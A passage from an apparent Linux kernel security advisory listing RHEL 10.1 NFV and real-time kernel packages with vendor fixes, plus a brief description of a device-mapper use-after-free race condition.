fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in the Linux kernel's device mapper (dm) component. When setting up zone append emulation resources, a race condition can occur if the `blk_revalidate_disk_zones()` function fails while another process simultaneously calls `dm_blk_report_zones()`. This timing issue can lead to a use-after-free error, potentially allowing a local attacker to achieve privilege escalation or cause a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
